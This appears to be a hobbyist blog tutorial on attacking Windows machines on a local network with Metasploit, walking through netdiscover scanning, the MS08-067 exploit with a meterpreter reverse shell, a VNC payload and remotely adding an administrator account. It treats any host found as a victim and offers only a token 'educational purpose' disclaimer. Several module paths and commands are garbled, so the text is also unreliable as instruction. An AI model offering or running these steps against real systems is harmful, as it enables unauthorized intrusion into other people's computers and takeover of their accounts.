Metasploit Hacking tutorial in LAN

Salam Guyz,

Today i'll show y0uh how to use Metasploit(Msfconsole)
to hack someone in y0ur LAN(Local Area Network)

things y0u'll need
1) Backtrack
2) Metasploit
3) users in LAN

so tym t0 play the Game! Xd

1st get y0ur ip by typing ifconfig in backtrack terminal and get y0ur internel ip
192.168.x.x
n0w 0n y0ur bt and open terminal and type
netdiscover -r 192.168.1.0/24
-r means Range
let it scan the network
after scanning y0u can pick any ip for hacking ;) :P

N0w G0to
Application => Exploitation Tools=>Network Exploitation => metasploit => msfconsole
or y0u can simply type in terminal => msfconsole
after msfconsole loaded type
set lhost 192.168.x.x (your internel ip)
LHOST => your internel ip will appear

then
set rhost (victim's ip address y0u g0t from scanning)
RHOST => 192.168.x.x (victims internel ip)

N0w Choosing V.i.P Exploit and PayloaD

Exploit= netapi And PayloaD= meterpreter reverse TCP BEST!!!

type

use windows/metasploit/ms08_067_netapi
exploit => ms_08_067_netapi

then type

set payload/windows/meterpreter/reverse_tcp
PAYLOAD => Meterpreter

now just type exploit
exploit

and it will start exploiting :P
you can get remote desktop by changing payload ..
set payload windows/vncinject/reverse_tcp

Y0u Can als0 add an administrator Remotely!

meterpreter>run getgui -u username -p password
-u is username And -P is password :P

HaPpY Exploiting in Y0ur LAN =P

Note:- For EducatioaL Purpose Only !!
it Will Only W0rk if y0ur victim's machine is On and Working !

Commentaires

Posts les plus consultés de ce blog

How to enter the Deep Web / Darknet links